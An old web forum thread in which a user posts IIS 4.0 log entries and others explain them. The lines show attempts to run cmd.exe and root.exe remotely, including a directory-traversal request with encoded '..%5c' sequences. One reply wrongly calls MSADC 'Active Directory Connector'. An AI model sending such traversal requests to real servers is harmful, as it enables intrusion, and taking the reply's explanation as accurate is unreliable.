-
Hacked?
Hi,
Can someone please look at the log file below and tell me exactly what is going on? This is the log file from an IIS 4.0 server.
-------------------------------------------------------------------------------
GET /scripts/root.exe /c+dir 404 604 72 2* 80 HTTP/*.0
GET /MSADC/root.exe /c+dir 404 604 70 20 80 HTTP/*.0
GET /c/winnt/system*2/cmd.exe /c+dir 404 604 80 20 80 HTTP/*.0
GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system*2/cmd.exe /c+dir 500 0 *45 *0 80 HTTP/*.0
-------------------------------------------------------------------------------
these are just a few examples of the log entries.
-
Hacked?
Sigh... I do wish you would use the term "Cracked": [url]http://www.pcwebopaedia.com/TERM/h/hacker.html[/url]
llS huh, hmmm... Looks suspicious to me. Do you have all MS security (oxymoron) patches installed? I do believe Gibson's got some stuff on llS exploits somewhere in his labyrinth: [url]http://grc.com/default.htm[/url]
-
:rolleyes:
I guess the problem is not one of terminology but of language - no matter how cracked someone has been, what they probably feel is hacked -- it just sounds right.
-
-
HI,
MSADC IS Microsoft Active Directory Connector
CMD.EXE /C
CARRIES OUT the command specified in string and then terminate.
some * was trying to execute a command on ur system
more like looking at the directory
dir 404 604 80 20 80 HTTP/*.0
GET /msadc/..%5c../..%5c../..%
SEE THE directory and what ever.
it looks like the person did not know it was an iis server and tried all what he knew.
he was having a look at whats in ur computer.
now call it crack or hack or what ever u wish.
regards Data.